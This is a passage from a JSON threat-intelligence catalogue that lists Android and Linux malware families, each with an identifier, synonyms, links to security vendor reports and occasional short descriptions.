- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor",
- "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
- "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://media.ccc.de/v/33c3-7901-pegasus_internals",
- "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/"
- ]
- },
- "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad",
- "value": "Chrysaor",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor",
-
"https://twitter.com/LukasStefanko/status/1042297855602503681"
- ]
- },
- "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724",
- "value": "Clientor",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "SpyBanker"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic",
- "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/"
- ]
- },
- "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a",
- "value": "Connic",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/"
- ]
- },
- "uuid": "8a42a699-1746-498b-a558-e7113bb916c0",
- "value": "Cpuminer",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker",
- "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/"
- ]
- },
- "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c",
- "value": "DoubleLocker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy",
- "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
- ]
- },
- "uuid": "8269e779-db23-4c94-aafb-36ee94879417",
- "value": "DualToy",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap",
- "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/"
- ]
- },
- "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b",
- "value": "Dvmap",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot",
-
"https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/"
- ]
- },
- "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd",
- "value": "ExoBot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy",
- "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
- ]
- },
- "uuid": "4305d59a-0d07-4021-a902-e7996378898b",
- "value": "FlexiSpy",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "gugi"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet",
- "https://twitter.com/LukasStefanko/status/886849558143279104"
- ]
- },
- "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f",
- "value": "FlexNet",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/"
- ]
- },
- "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5",
- "value": "GhostCtrl",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove",
- "https://www.clearskysec.com/glancelove/",
- "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
- "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
- "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
- "https://www.ci-project.org/blog/2017/3/4/arid-viper"
- ]
- },
- "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
- "value": "GlanceLove",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat",
-
"https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/"
- ]
- },
- "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6",
- "value": "HeroRAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat",
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
- ]
- },
- "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf",
- "value": "IRRat",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat",
- "https://blog.lookout.com/mobile-threat-jaderat"
- ]
- },
- "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0",
- "value": "JadeRAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid",
- "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html",
- "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/"
- ]
- },
- "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0",
- "value": "KevDroid",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler",
- "https://twitter.com/LukasStefanko/status/928262059875213312"
- ]
- },
- "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3",
- "value": "Koler",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus",
- "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/"
- ]
- },
- "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0",
- "value": "Lazarus",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
-
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf",
- "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990"
- ]
- },
- "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c",
- "value": "Lazarus ELF Backdoor",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki",
- "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/"
- ]
- },
- "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f",
- "value": "Loki",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot",
- "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html"
- ]
- },
- "uuid": "4793a29b-1191-4750-810e-9301a6576fc4",
- "value": "LokiBot",
- "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot."
- },
- {
- "meta": {
- "synonyms": [
- "ExoBot"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher",
- "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
- "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
- "https://www.clientsidedetection.com/marcher.html",
- "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html"
- ]
- },
- "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e",
- "value": "Marcher",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot",
- "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/",
- "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html"
- ]
- },
- "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826",
- "value": "MazarBot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot",
- "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html"
- ]
- },
- "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde",
- "value": "MysteryBot",
- "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat",
- "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/",
- "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co"
- ]
- },
- "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5",
- "value": "OmniRAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Popr-d30"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30",
- "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/",
- "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/"
- ]
- },
- "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
- "value": "X-Agent",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub"
- ]
- },
- "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616",
- "value": "Fake Pornhub",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir",
- "https://twitter.com/PhysicalDrive0/statuses/798825019316916224"
- ]
- },
- "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef",
- "value": "Raxir",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2",
- "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores"
- ]
- },
- "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f",
- "value": "RedAlert2",
- "description": "RedAlert 2 is 
an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", - "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/", - "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", - "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", - "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html" - ] - }, - "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected." 
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis",
- "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
- "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/"
- ]
- },
- "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82",
- "value": "Roaming Mantis",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik",
- "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer",
- "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java"
- ]
- },
- "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417",
- "value": "Rootnik",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree",
- "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/",
- "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf"
- ]
- },
- "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22",
- "value": "Skygofree",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "SlemBunk"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo",
- "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html",
- "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"
- ]
- },
- "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff",
- "value": "Slempo",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/"
- ]
- },
- "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0",
- "value": "Slocker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy"
- ]
- },
- "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab",
- "value": "SMSspy",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker",
- "https://news.drweb.com/show/?i=11104&lng=en",
- "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/"
- ]
- },
- "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04",
- "value": "SpyBanker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr"
- ]
- },
- "uuid": "31592c69-d540-4617-8253-71ae0c45526c",
- "value": "SpyNote",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent",
- "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
- ]
- },
- "uuid": "0777cb30-534f-44bb-a7af-906a422bd624",
- "value": "StealthAgent",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango",
- "https://www.lookout.com/info/stealth-mango-report-ty"
- ]
- },
- "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f",
- "value": "Stealth Mango",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng",
- "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/"
- ]
- },
- "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76",
- "value": "Svpeng",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher",
- "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/"
- ]
- },
- "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e",
- "value": "Switcher",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat",
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
- ]
- },
- "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea",
- "value": "TeleRAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar",
- "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware"
- ]
- },
- "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff",
- "value": "TemptingCedar Spyware",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Catelites Android Bot",
- "MarsElite Android Bot"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz",
- "http://blog.group-ib.com/cron"
- ]
- },
- "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3",
- "value": "TinyZ",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan",
- "https://blog.lookout.com/titan-mobile-threat",
- "https://www.alienvault.com/blogs/labs-research/delivery-keyboy"
- ]
- },
- "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327",
- "value": "Titan",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada",
- "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
- "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
- "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
- "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
- "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/"
- ]
- },
- "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8",
- "value": "Triada",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001",
- "https://twitter.com/illegalFawn/status/826775250583035904"
- ]
- },
- "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6",
- "value": "Unidentified APK 001",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002"
- ]
- },
- "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544",
- "value": "Unidentified APK 002",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat",
- "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/",
- "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/"
- ]
- },
- "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9",
- "value": "Viper RAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex",
- "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/",
- "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/"
- ]
- },
- "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46",
- "value": "WireX",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot",
- "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/",
- "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/"
- ]
- },
- "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387",
- "value": "Xbot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat",
- "https://blog.lookout.com/xrat-mobile-threat"
- ]
- },
- "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32",
- "value": "XRat",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark",
- "https://securelist.com/whos-who-in-the-zoo/85394",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf"
- ]
- },
- "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3",
- "value": "ZooPark",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Qysly"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg",
- "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1",
- "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2",
- "https://securelist.com/ztorg-from-rooting-to-sms/78775/"
- ]
- },
- "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202",
- "value": "Ztorg",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16",
- "https://news.drweb.com/show/?c=5&i=10193&lng=en"
- ]
- },
- "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8",
- "value": "Irc16",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "gayfgt",
- "Gafgyt",
- "qbot",
- "torlus",
- "lizkebab"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/",
- "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/",
- "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf"
- ]
- },
- "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9",
- "value": "Bashlite",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "CDorked.A"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked",
- "https://www.symantec.com/security-center/writeup/2013-050214-5501-99",
- "https://blogs.cisco.com/security/linuxcdorked-faqs",
- "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/",
- "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/",
- "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html"
- ]
- },
- "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0",
- "value": "CDorked",
- "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech"
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
- "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a"
- ]
- },
- "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b",
- "value": "Chapro",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer",
- "https://github.com/pooler/cpuminer"
- ]
- },
- "uuid": "8a42a699-1746-498b-a558-e7113bb916c0",
- "value": "Cpuminer",
- "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury",
- "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
- "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf",
- "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
- "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/"
- ]
- },
- "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5",
- "value": "Ebury",
- "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/"
- ]
- },
- "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864",
- "value": "Erebus",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4",
- "https://www.recordedfuture.com/chinese-cyberespionage-operations/"
- ]
- },
- "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60",
- "value": "ext4",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime",
- "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf",
- "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
- "https://x86.re/blog/hajime-a-follow-up/",
- "http://blog.netlab.360.com/hajime-status-report-en/",
- "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
- "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
- "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/",
- "https://github.com/Psychotropos/hajime_hashes"
- ]
- },
- "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489",
- "value": "Hajime",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai",
- "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
- ]
- },
- "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743",
- "value": "Hakai",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "HNS"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek",
- "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/",
- "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
- "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/",
- "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
- "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/",
- "https://blog.netlab.360.com/hns-botnet-recent-activities-en/"
- ]
- },
- "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
- "value": "Hide and Seek",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "IoTroop",
- "Reaper"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper",
